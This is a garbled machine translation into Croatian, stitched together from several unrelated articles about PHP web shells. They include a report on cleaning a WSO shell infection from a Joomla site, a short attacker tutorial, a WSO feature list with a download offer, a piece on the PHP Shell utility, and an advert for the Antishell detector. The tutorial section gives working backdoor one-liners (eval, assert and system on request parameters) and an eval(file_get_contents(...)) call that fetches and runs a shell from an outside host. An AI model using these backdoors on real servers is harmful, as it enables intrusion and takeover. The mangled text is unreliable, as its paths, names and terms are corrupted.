Kao što je Hunter Web Shell Antishell pomaže tražiti zlonamjerne web školjke. Zlonamjerna RNR Shell skripta - gdje noge rastu iz onoga što je web-ljuska

Zlonamjerni WSO pronašao PNR školjke /librarseys/simplepie/idn/openidopenid.php (mjesto na Joomli! 3). Na ovaj trenutak Odredite samo nekim antivirusima kao što su JS / SARS.S61, PHP: decode-de, trojan.html.agent.vsvbn, php.shell.shell.Sell.unclated.359.ulofficial.

U jednom "lijepom" (što je netko), jedan od naših odjela (http://ladinews.biz), kao rezultat skeniranja vaše web-lokacije, hosting antivirus, primio je takvu poruku:

Incounter je otkrio datoteke s zlonamjernim sadržajem. Preporučujemo da ograničava pristup FTP računu samo samo koristite IP adrese, kao i iskorištavanje zaštita protiv virusa Za provjeru računa za viruse. Pročitajte preporuke za sigurnost i zaštitu sjeckanja kako biste spriječili ponovno infekciju.

Naravno, predloženo je da se bave ovom sramotom, skeniranje Clamav redovitog antivirusa, s nizom antivirusnih baza podataka prema zadanim postavkama nije dao dodatni rezultat.

U vrijeme pokretanja ove priče (2015-10-23), ova virusna shell skripta bila je odsutna u antivirusnoj bazi podataka većine antivirusima, uključujući takve "čudovišta" kao Comodo, DrWeb, ESET-NOD32, Gdata, Kaspersky, McAfee, McAfee, McAfee, McAfee, Microsoft, Symantec, trendmicro i sl, koji je također 2015-10-23 potvrdio je virustotalni online skener. Samo nekoliko antivirusi mogli su odrediti zlonamjerne PHP skripte:

Antivirus rezultat osvježavanja Datum Ahnlab- v3 JS / SARS. S61 20151022 Avast PHP: decode- de [TRJ] 20151023 nano-antivirus trojanski. Html. Agent. VSVBN 20151023.

Istog dana, Clamav i Dr.Web su obaviješteni o otkrivanju zlonamjernog pisma. ClaMav je još uvijek tvrdoglavo tiho, a Dr.Web je odgovorio na zlonamjernu pošiljku u roku od 24 sata:

Vaš zahtjev je analiziran. Odgovarajući unos se dodaje u Dr.Web virusna baza podataka i bit će dostupna na sljedećem ažuriranju.

Prijetnja: php.shell.354.

Dr.Web je zadržao svoje obećanje i virus skriptu OpenDopenid.php je sada definiran kao php.shell.354, ali mnogi antivirusi kao što su Clamav, Comodo, DrWeb, ESET-NOD32, Gdata, Kaspersky, McAfee, Microsoft, Symantec, trendmicro, itd. , str., Nema pojma o tome nema (od 2015-10-25).

U redu., Izbrisali smo datoteku i da ćete dugo vremena? Odakle je došao, možemo se izgubiti samo nagađam. Što je sljedeće? Počinjemo staviti sve vrste sigurnosnih komponenti i uvrnuti pravila v.htaccess koji zabranjuju pristup sve i sve za zajedničko hosting (aka virtualni hosting, zajednički hosting) na veće nemamo ovlasti. Koliko će ove mjere uštedjeti, nitko ne zna.

Usput na temu svih sigurnosnih komponenti ... SecurityCheck je komponenta za Joomla! I prilično dobro. No, određena "antivirusna website zaštita" potpuno sranje s kojim ću svakako koristiti bilo koga, ovdje je potvrđena praksa pregled o ovoj "antivirusnoj web stranici":

Ova komponenta također stvara paket.tar datoteku u vašem / TMP koji sadrži vašu konfiguraciju.php i bilo koje druge lozinke pronađene! Biti svjestan.

Da u prijevodu znači: "Ova komponenta također stvara i backup Ukupno web-lokacije u /tmp/pack.tar, koji sadrži konfiguraciju.php s lozinkom baze podataka! Budite oprezni "- to sugerira da" Website zaštita "iz ove komponente ne miriše, što bi također trebalo dovesti žrtvu na pomisao na promjenu načina za direktorij / dnevnike, / TMP, / cache i zabraniti pristup njima.

Prelazak ove veze može se razumjeti da je problem najmanje više od godinu dana. Gledajući ovdje, razumijemo da je maskiranje Spell skripta je napravljena kino baza64_encode / gzdeflate, što znači negdje drugdje treba biti dio poziva / plug-in and-in and-in and-in and-in and i izvođenje base64_decode / gzinflat. Tako openyopenid.php je samo rezultat (aka posljedica), a ne razlog gdje se žrtva žali da, s poslužitelja, počeo slati neželjenu poštu na industrijsku skalu s poslužitelja, a ručno uklanjanje zlonamjernih datoteka ne pomaže, nakon čega žrtva osim na Nic-Ru hosting da se ne žale nikoga drugoga. "Rupni" virtualni hosting može biti vrlo dobar. Čak i često, Imho ljudi rade tamo za S / N, a ne za ideju, ali u nekim slučajevima problem može biti znatno dublji.

Ovdje, na primjer, "Adobe Flash datoteka otkrila je zlonamjernog iframe injektor. Mislim da nije tajna da možete pisati sučelja za preuzimanje datoteka na web-lokaciju i napraviti mnogo različitih zanimljivih stvari na jeziku Actiancript. V. virus datoteka V.SWF ( Adobe Flash.), kao što je praksa pokazala, može ostati nezamijećena godina i biti crna vrata na mjestu ( aka natrag vrata - stražnja vrata) Kroz koje se mogu ukloniti datoteke poput "Opendopenid.php" prije formiranja i bez uspjeha.

Što učiniti, kako među tisućama datoteka naći "slaba link"? Da biste to učinili, morate koristiti takozvanu heurističku analizu iu nekim slučajevima da se primjenjuju antivirusne baze podataka programera trećih strana. Treba uzeti u obzir da heuristička analiza, ovisno o njegovim postavkama, može dati mnogo lažnih pozitivnih, nego kada koriste dodatne virusne potpise od developera trećih strana.

Gdje dobiti antivirusne baze podataka programera trećih strana? Na primjer, baze podataka s anti-virusnim potpisima od developera trećih strana za Clamav, možete besplatno uzeti na adrese: www.securiteinfo.com, malwarepatrol.net, rfxn.com. Kako koristiti ove dodatne antivirusne baze? U potpunosti će biti druga priča. Možete samo reći da dodatne anti-virusne baze podataka za ClaMav iz RFXN.com (LMD projekt (Linux malware detektirati)) su usmjerene na pronalaženje zlonamjernog u web aplikacijama i daju uspješnije rezultate. RFXN.com također izjavljuje da je 78% prijetnji čiji se otisci sadržani u svojoj bazi podataka ne definiraju više od 30 komercijalnih anti-virusa, a najvjerojatnije je.

Dakle ... ono što je završilo priču s zlonamjerno RNR-Shell Script OpenDopenid.php?

Odlučeno je zaliha dodatnih antivirusnih baza podataka za ClaMav iz malwarepatrol.net i Rfxn.com, preuzmite sigurnosnu kopiju web-mjesta Da, skenirajte ga lokalno, evo rezultata skeniranja:

Dolara Mbl_647563.Ulofficial pronađen / ../ Loader_rus.swf: mbl_647563.Ulofficial pronađeno ----------- Scan Sažetak ----------- Poznati virusi: 4174348 Verzija motora: 0.98.7 Skenirani direktoriji: 3772 Skenirane datoteke: 18283 zaražene datoteke: 5 Ukupno grešaka: 1 Data skenirani: 417.76 MB Data Pročitajte: 533,51 MB (omjer 0,78: 1) Vrijeme: 1039.768 sek (17 m 19 s)

/Librarseys/simplepie/idn/openidopenid.php. Kao što je navedeno navedene datoteke .swf su uklonjene, ali postoji li problem? Još uvijek je teško reći, - kopaju dalje ...

Iz dešifrirane verzije datoteke /Librarseys/simplepie/idn/openidopenid.php. (http://pastebin.com/wrlrlg9b), gledajući konstantu @define ("WSO_VERSION", "2.5"); Postaje jasno da je to takav proizvod nazvan WSO. Mala zastrašujuća mreža za WSO ključnu riječ, to su rezultati:

Tema je odavno nije nova, dobro, uzimamo u zubi Regexxer, nastavljamo ubrzati datoteke datoteke i otkriti: Pogreška u otvaranju imenika "/ Početna / Korisnik / Knjižnice / Joomla / Cache / kontroler / Cache": Onemogućeno

Da, ovdje si s.ko gdje je još vidio! Gledamo pravo na direktorij, koji ne bi trebao biti prema zadanim postavkama, \u003d CHMOD 111 (aka nastupa za vlasnika / grupe / sve). Dakle, nešto sjedi negdje i milovati se u katalozima koji se skrivaju čak i od virusa Chmodami 111.

Nakon što je instaliran za katalog Chmod 551 i pogledao unutra, otkriveno je /Librarsees/joomla/cache/controller/cache/cache/langs.php., izvor Ovdje je namamljeno: http://pastebin.com/jdtwpxjt - katalog / Knjižnice / Joomla / cache / kontroler / cache Obrišimo.

Izvrsno, sada smo stavljeni u sve datoteke i kataloge:

# Masovna promjena prava (chmod) na datotekama u imeniku. / Dirame i temeljni Pronađi / home / korisnik / public_html -type f -ek chmod 644 () \\ t # Masovna promjena prava (CHMOD) na c. / Dirtame i temeljni Pronađi / home / korisnik / public_html -type d -exec chmod 755 () \\ t

Ponovno ponovimo test antivirusa s dodatnim klamičkim /ladinew.biz bazama, ali navodno je sve čisto.

Ponovite potragu za regexxer datoteke i pokušajte tražiti ključne riječi OpenDopenid, OpenID ili WSO - i, dolazimo do zaključka da je P. Zdez pokazao da je mnogo šire i dublje:

  • - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/jyeizy9g
  • /Administrator/components/com_Finder/controllers/imagelist.php. - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/0uqdrmgv
  • /Administrator/Components/com_users/tables/css.php. - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/8qnttsyma
  • /Administrator/templates/hathor/html/com_contact/contact/toolbar.trash.html.php. - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/ctvuzsiz
  • /Componente/com_JCE/ditor/tiny_mce/plugins/link/img/Manager.php. - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/2nwtncxx
  • /Librarsees/joomla/Aplication/web/router/helpsites.php. - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/anhxyvl9
  • /Plugins/yshortcodes/xml.php. - Ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/gnmsdfc9
  • /Templates/index.php - ne bi trebalo biti ovdje, ovdje je njegov izvor: http://pastebin.com/ghbmef2t

/Administrator/components/com_admin/index.php. i /temps/index.php su vjerojatno bili ulazni skripte u kojima je glavni kôd proveden pomoću funkcije eval () koja nije preporučena za korištenje gdje se također koristi:

Pa, logika maskiranja zlonamjernog koda je jasna. Sada, ako tražimo dizajn "eval ($", naći ćemo mnogo zanimljivih stvari:

  • /Administrator/components/com_admin/sql/updates/postgresql/php.php. - http://pastebin.com/grhvxt5u
  • /components/com_kunena/template/blue_agle/media/iconsets/buttons/bluebird/newsfeed.php. -
  • /componente/com_mailto/helpers/index.php. -
  • /Componente/com_users/views/login/file.php. -
  • /components/com_users/controller.php. - zaražena i zahtijeva zamjenu!
  • / ucludes/index.php -
  • /Librarsees/joomla/string/wrapper/prection.php. -
  • /Librorses/legcy/access/directory.php. -
  • /Librarseys/nexend/javascript/jquery/inputfilter.php. -
  • /Librors/neXend/smartslider/admin/views/sliders_slider/tpl/config_tinybrowser.php. -
  • /Librarseys/xef/assets/less/admin.frontpage.php. -
  • /Media/ditors/codemirror/mode/rust/alias.php. -
  • /Modules/mod_kunenalati/language/zhh-tw/smpt.php. -
  • /Modules/mod_kunenalogin/language/de-de/xul.php. -
  • /plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/credits.php. -
  • /Templates/sj_news_ii/html/mod_sj_contact_ajax/toolbar.messages.php. -

Nisu svi drugi virus RNP skripte objavljene na pastebin.com 24 sata je dopušteno samo 10 publikacija. Općenito, nalog za brisanje je približno slijedeći:

Da, gotovo sam zaboravio, - prije nego što počnem ukloniti zlonamjerne skripte, neće spriječiti dodavanje v.htaccess nekoliko pravila koja zabranjuju izravan pristup u bilo koji.php datoteke u bilo kojem direktoriju, ali dopuštajući samo root datoteke / ili /index.php i / administrator / ili / administrator/index.php - to će pars u suprotnom napadaču pristup dolaznim pismeni skripte skrivene u raznim sistemskim direktorijima:

UPD 2015-10-28: Pa, što? Jeste li se već opustili? Prerano je...

Sada i dalje gledate u polje site datoteka binarne datotekekoji u motoru ne smije biti u mami:

find / MyPath / A-shectible -Type f pronaći / myPath / -Type f -perm -U + X Pronađi / myPeth / -Type F | Xargs datoteka | Grep "\\ t

Tko traži - on će uvijek pronaći (binarne datoteke):

  • /Modules/mod_p30life_Exckatincy_calc/tmpl/accordian.pack.js.
  • /Images/stores/audio/34061012-b1be419Af0b9.mp3
  • /Librarseys/xf/sources/fourder/navigation.php.
  • /Librarseys/joomla/application/web/application.php.
  • /Librors/joomla/document/json/admin.checkin.php.
  • /Librorses/neXext/essets/css/licensees.php.
  • /Librarsees/fof/config/domain/toolbar.Kategorije.html.php.
  • /Librures/fof/form/field/client.php.
  • /Librarseys/photf8/sysinfo_system.php.
  • /components/com_mobileJoomla/index.php.
  • /componente/com_mobileJoomla/sysinfo_system.php.
  • /Components/index.php.
  • /Components/com_banners/sysinfo_config.php.
  • /componente/com_kunena/views/home/admin.checkin.php.
  • /componente/com_JCE/editor/tiny_mce/plugins/source/js/codemirror/toolbar.checkin.php.
  • /componente/com_Jce/plugins/colorpicker/admin.cache.php.

Prikladan

Gdje su došle noge iz ove infekcije, nije bilo moguće pouzdano utvrditi je li kritična ranjivost nedavno pronađena u motoru omogućujući vam da izvršite SQL injekcije i povećate povlastice, bilo da je gore navedeno navedeno kao zlonamjerna .swf datoteke ili još uvijek Još nije otkriven do sada - do ranjivosti u jednoj od komponenti trećih strana ili dodataka, ili rupni virtualni web hosting, - pitanje ostaje otvoreno?

Trenutno, otkrivene zlonamjerne datoteke se čiste, datoteke motora su u potpunosti ponovno učitane, barikade su izgrađene od strane V.Htaccess pravila ... Tko ima vremena i koji je zainteresiran za skupljanje i izgladiti ovu gomilu sranja možete preuzeti WSO-PHP -Hell-in-joomla.zip - sve gore spomenute zlonamjerne RNR datoteke, lozinku iz arhive: www.Sype

Ukupno: Parabania se ne događa mnogo, i bilo koji slobodan ili komercijalni antivirus sa svojom heuristikom, zajedno s dodatnim potpisnim bazama, a ne panacejom. Prema tome, bilo koji anti-virusi su zastarjeli alat za zaštitu aktivnog multiplayer okruženja i kako bi se spriječilo razne nepoznate prijetnje, to je pararanoidne metode zaštite, na primjer: virtualizacija, Selinux, Bastille Linux, nepromjenjivi bitni, efryptfs itd!

  • Prijetnja: WSO PHP web ljuska
  • Žrtva: ladynews.biz

Nije taj članak, ali mnogi će biti korisni. Dakle, prodrli smo admin panel, na kraju smo mogli negdje pušiti takav kod, na primjer:

ako (Izvodi ($ _ zatražite [e "])) eval (stropslashes ($ _ zahtjev [" e "]);


ili jednostavno:

tvrdnja (stropslovice ($ _ zahtjev));


stripLashes u ovom slučaju, isključivo za zaobilaženje magic_quotes \u003d na
Mnogi su umetnuti

sustav ($ _ dobiti ["cmd"]))

I druge sramote, ali sve je previše, u stvari, sve je lakše. Dakle, umetnuli ste ovaj kôd negdje (u faq.php, ili već jednostavno upišite takav befdor negdje u dubinama skripti poslužitelja).
Oni. Kao rezultat toga, na primjer ste postigli zdravlje ovog linka:

http: //localhost/user.php? E \u003d phpinfo ();


I nakon toga, mnogi početnički stupor. Odmah sljedeće pitanje - što učiniti sljedeće?
I pogledajmo ovaj phpinfo koji smo pokrenuli, glavne dvije točke koje ćemo biti zainteresirani za ovu situaciju:

allow_url_fopen.
allow_url_include.

allow_url_include.

Da, Tin, naravno, ali, u pravilu, isključen.

Ostaci

I on, u pravilu \u003d dalje. Kako možemo iskoristiti ovu priliku, bezobzirno lijevo od administratora, tako da se ne okupamo osobito (ne tražiti mape dostupne na zapisu i slične gluposti da saznate i ne ispunjavam školjku na sve, ali volim se popeti na poslužitelju). Da, vrlo jednostavno. Ako a

allow_url_fopen \u003d uključeno.

I imate kod koji uklanja barem da ste već pročitali sve konfiguracije, spojili sve što vam je potrebno, itd. (Nemojte brkati s "običaj", samo ono što mogu čitati)

Uzmite posljednju školjku iz duboko održavana orb., Uklonite prvu retku:

+
uklanjamo potonje
+
možete izbrisati lozinku, ljuska ne ispunjava, samo koristiti, ne odlazite

držite na bilo kojem hostu kao blaga_bla.txt (Isti Narod.ru je sasvim prikladan) ili u obliku slike na usluzi dijeljenja datoteka koje pruža izravne veze na skok sadržaja i donosi takav zahtjev:
Kod:

http: //localhost/user.php? a \u003d eval (datoteka_get_contents ("http://site.ru/bla_bla.txt));


Sve. Imate punu ljusku bez fizičkog utjecaja na poslužitelj sa svim uobičajenim mogućnostima ljuske. Hvala na pažnji
P.S: Testirano na WSO2.4 ( wsa2_pack.php.)

Opis školjke:
Odobrenje
Informacije o poslužitelju
Upravitelj datoteka (kopiranje, preimenovanje, premještanje, brisanje, chmod, dodir, stvoriti datoteke i mape)
Prikaz, HexView, uređivanje, Davnotad, Apple
Rad s ZIP arhivima (pakiranje, raspakiranje)
Konzola
SQL Manager (MySQL, PostgreSQL)
Izvršenje php koda
Radite s redovima + pretraživanje hesha u online bazama
Bondport i Beck Connect (Perl)
Pretraživanje teksta u datotekama
* Nix / Windows
Od čipova
Antipoiskovik (pregledani korisnički agent ako se tražilica tada vraća 404 pogrešaka)
Konzola se pamti unesene naredbe. (Možete ih kretati kroz strelice prema gore, dolje kada se fokusirate na polje za unos)
Možete koristiti AJAX
Niska težina (24,32 KB)
Odaberite kodiranje u kojem ljuska funkcionira.

Ovaj uslužni program pruža web sučelje za daljinski rad s operativnim sustavom i njegovim uslugama / demonima.
Upotreba ovog proizvoda je u ilegalnim ciljevima suočava se s kaznenom odgovornošću.

Arhiva sadrži najnoviju verziju ljuske i mali WSOManager Toolz - za rad s školjkama.

Preuzmite Shell:

Nedavno, na goleme prostranstva Interneta, naišao sam na spomenuti " Php ljuska"Prije nekoliko godina, ovaj korisnost mi je jako puno pomogao i sada želim dati neku vrstu dužnosti svog developera Martin Geisler (http://mgeisler.net/).

Koja je svrha "PHP ljuska"? Vjerujem da svaki "napredni" web programer, da ne spominjemo Sysadmina, naišao je i koristio SSH. SSH nam omogućuje da dobijemo daljinski pristup poslužitelju i izvedete naredbu ljuske na njemu (dobro, postoje sve vrste naredbi kao što su hodanje na katalozima tamo, gore, premjestiti, brisati i kopirati datoteke, pokrenuti scenarije i sve vrste uslužnog programa ), kao da je žica na monitor iz jedinice sustava produljenu do nevjerojatnih veličina i već dosegnuta, na domaćina poslužitelja. Moram reći da je moguće kroz SSH na tuneliranje i X-Grafika, sliku na radnoj površini, prikazuje aplikacije za pokretanje prozora, ali to očito nije za web poslužitelje.

Ukratko, ako nemate ssh na hosting, onda "ono što nije u redu u dansko kraljevstvo." Minus je, često zadani SSH na vašem "svježem" mjestu je onemogućeno, a potrebno je neko vrijeme za mirno s uslugom podrške tako da je ssh zaradio. To je upravo ono što se dogodilo u toj udaljenoj zimskoj večeri. Morao sam hitno prenijeti mjesto s jednog stroja na drugi, tijekom onih problema nastao, a ja sam se naljepljivao na desktopu, tako da postoji "unutar" u pacijentu. Ups ... i SSH podrška nije aktivirana. Kako biti? Ako ste dovoljno u iskušenju u programiranju na nekom jeziku, neće biti teško napisati malu skriptu koja implementira potreban zadatak. Otvaram Google i trčanje oko para veza, našao sam spomen PHP ljuske. Jednom sam otišao kući na vrijeme.

Zapravo, bio sam vrlo sretan što smo imali dovoljno onih onih odrezanih mogućnosti za rad s ljuskom, koji mi je pružio PHP školjku - još uvijek njegova imitacija.

U središtu njene php ljuske koristi PHP funkciju - proc_open. Ova značajka započinje određenu naredbu i otvara ulazne izlazne tokove za unos nekih informacija u aplikaciju (imitiranje ručnog unosa kao što je na tipkovnici) i prikaz rezultata rada (ako znate koje cijevi tada govorimo o njima) , Zapravo, procec_open funkcija je poboljšana i proširena verzija značajki EXEC ili sustava. Oni, istina je pokrenula samo program, i nije vam omogućio interakciju s njom, trebali biste odmah imati u parametrima naredbenog retka da biste odredili sve podatke za operaciju koju trebate. Proc_open vam omogućuje da stvorite cijevi povezane s PHP Skipte, a možete uskladiti unos podataka u program i pročitati rezultate njegove operacije. Za ljubitelje slobodnih hostara, odmah ću reći:

"Ne, s PHP ljuskom, nećete moći pristupiti ssh."

Činjenica je, za besplatno ili vrlo jeftino hosting hosting, morate pokrenuti php u sigurnom načinu rada. Onemogućeno je nekoliko funkcija, uključujući iC_open.

"Ne, s Phpshell, nećete moći raditi s interaktivnim programima."

Suština weba nam govori da nije moguće pokrenuti određeni program koji je nastavio raditi na udaljenom poslužitelju, koji će nastaviti raditi i omogućiti da uđemo i izlažu podatke za nekoliko odvojenih HTTP zahtjeva.

"Ne, ne možete pristupiti svim programima, datotekama i mapama na poslužitelju."

Skripta radi u ime Apachea, a zatim su njegove sposobnosti ograničene samo na prava kako bi učinili Apache račun. Ili kao opcija ako se sauxec koristi na hostingu (http://en.wikipedia.org/wiki/suexec), tada će se vaša prava podudarati s računom računa o kojem je PHP skripta radi.

Pretpostavimo da vas to nije zaustavilo i preuzeli ste i raspakirali arhivu na poslužitelju u mapu, recimo, Phpshell. Ako uđete u adresnu traku preglednika "nekako zove - vaše web stranice / phpshell / phpshel.php", od vas će se tražiti da se predstavite, unesite ime i lozinku - naravno, to nisu vjerodajnice koje ste primili od svog homoserirati

Dakle, morate konfigurirati prava pristupa: tko može pristupiti ljusci kroz ovaj korisnost. Da biste to učinili, u datoteci Config.php pronađite odjeljak korisnika i dodajte korisničko ime i zaporku na sljedeći način:

Vasyano \u003d tajna.

Ako ste zbunjeni činjenicom da je lozinka postavljena na otvorenom obrascu, zatim pomoću PWhash.php datoteke možete saznati izlet MD5 i u config.php datoteci će biti pohranjeni

Sada ćemo ponovno unositi ulaz i ući u prozor, gdje u dnu prozora ulazimo u naredbu, kliknite "Pokreni", a zatim rezultat njegovog izvršenja prikazuje se u središtu prozora stranice

Na ovome, sve, možda neka vam Phpshell nekako pomogne.

Većina napada na korporativne resurse podrazumijevaju uvođenje web školjki - koda koji omogućuje upravljanje zahvaćenim strojevima izvana mreže. Antishell Web Shell Hunter je zaštitni agent koji uključuje čitav niz mehanizama za identifikaciju web školjki.




Web Shell je skripta koja je učitana na poslužitelj i služi za daljinsko upravljanje. Ona postaje zlonamjerna samo kad kontroliraju napadača. I u ovom slučaju, on predstavlja ozbiljnu prijetnju.

Inficirani poslužitelj ne mora biti povezan s internetom - može se nalaziti u unutarnjoj mreži tvrtke. Zatim se web-ljuska koristi za pristup drugim domaćinima s kritičnim aplikacijama ili informacijama.

Za pisanje web školjaka primjenjuje se svaki jezik koji podržava ciljni web-poslužitelj. U praksi se najčešće koriste PHP i ASP, budući da su najpopularniji. Također proširite zlonamjerne programe na Perl, Ruby, Python i Unix Shell.

Web školjke su instalirani prilično standard za zlonamjerne aplikacije u metodi - koristeći ranjivosti u CMS ili Web poslužiteljskom softveru. Nakon toga funkcioniraju kao zaostatak, koji omogućuje napadaču da izvede proizvoljne naredbe na udaljenom računalu, uključujući i uvođenje unoseće softvera ili početak napada na druge poslužitelje.

Posebna opasnost od web školi je njihova relativna jednostavnost. Modifikacija skripte, koja rezultira drugom programom, zadatak je s kojim se čak i početnik može nositi. Zbog ove kvalitete, otkrivanje web školjke sa standardnim antivirusnim objektima je teško.

Kao i drugi zlonamjerni programi, web školjke mogu se identificirati za brojne vanjske znakove. Međutim, značajan dio njih može se odnositi i na potpuno pravne datoteke, tako da se svaki sumnjivi pokazatelji moraju razmotriti u kompleksu, analizirajući cijelu sliku, a ne njegove fragmente.

Mogući pokazatelji prisutnosti web-ljuske na poslužitelju mogu biti:

  • razdoblja abnormalno velikog opterećenja na poslužitelju;
  • prisutnost datoteka s sumnjivom vremenskom oznakom (na primjer, kasnije od vremena posljednjeg ažuriranja softvera);
  • dostupnost sumnjivih datoteka na mjestima dostupnih na internetu;
  • prisutnost datoteka u kojima postoje reference na cmd.exe, eval i slično;
  • dostupnost sumnjivog autorizacije s unutarnje mreže;
  • prisutnost datoteka koje generiraju promet koji su neprimjetni.

Očito, "Ručna" analiza u ovom slučaju, ako je moguće, zahtijeva previše ljudskih resursa, tako da je njegova uporaba lišena bilo koje praktične izvedivosti. Antishell Web Shell Hunter, razvijen od Garhi tehnologije, omogućuje automatiziranje ovog postupka, a njegovi programeri tvrde da je zajamčeno prepoznati sve poznate web školjke.

Aplikacija se temelji na sljedećim tehnologijama:

  • pretraživanje po ključnim riječima. Sve datoteke provjeravaju se riječima i naredbi koje mogu biti povezane s napadom;
  • analiza signala: Potražite potpise poznatih web školjaka;
  • analiza najdužih linija. Često se zlonamjerni kod šifrira na takav način da zaobiđe potraga po ključnim riječima. To čini redove koda posebno dugo, što im omogućuje da ih otkrije;
  • izračun Shannonove entropije u izvornoj kodu. Svaki red koda dodjeljuje se ocjena, na temelju kojih se može procijeniti stupanj prijetnje;
  • potražite zlonamjerni kod po metodi slučajnosti.

To rješava jedan od glavnih problema otkrivanja web školjaka povezanih s različitim jezicima koji se koriste i mogućnost jednostavne izmjene. Na djelu Antishell Web Shell Hunter, ovi čimbenici ne utječu na bilo gdje, što ga čini univerzalnim i omogućuje vam da koristite za zaštitu bilo kojeg poslužitelja.

Budući da su datoteke koje nisu promijenjene nakon prethodnog skeniranja isključene iz obrade, Antishell Web Shell Hunter ne stvara visoko opterećenje na poslužitelju. Osim toga, ovaj pristup smanjuje vrijeme provjere.

U isto vrijeme, administratori mogu samostalno postaviti vrijeme čekanja, na temelju dnevnih fluktuacija opterećenja na poslužitelju. Ako je potrebno, dnevni način zamjenjuje se tjednim ili čak mjesečnim, što vam omogućuje da optimizirate rad cijelog sustava.

Program otkriva datoteke koje sadrže kôd web-ljuske, a administratoru sustava pruža pune informacije o objektu: datum i vrijeme stvaranja, ime vlasnika, pravo i tako dalje.

Svi ovi podaci (ali ne i sami datoteke) također ulaze u klijentski centar za korisnike, koji, na njihovoj osnovi može pružiti podršku za obradu incidenta i proučavanja njegovih posljedica. Kupci potpisani plaćenim uslugama također mogu koristiti posebnu uslužni program za preuzimanje zaraženih datoteka za daljnju analizu.

Poruke o pronađenim objektima šalju administratoru sustava putem e-pošte. On ne mora osobno slijediti proces.

Do danas, Antishell Web Shell Hunter je jedini alat usmjeren na otkrivanje web školjaka. Brojne antivirusne aplikacije uključuju sličnu funkciju, ali samo u obliku dodatne opcije, koji je neaktivan prema zadanim postavkama. U pravilu se temelje isključivo na analizi alarma, tako da njihova učinkovitost ostavlja mnogo da se želi.

Budući da korištenje web školi za napade na poslužitelje postaje sve češće, ima smisla zaštititi sustav pomoću specijaliziranog rješenja. Kao što kažu, sigurnost nikada nije previše.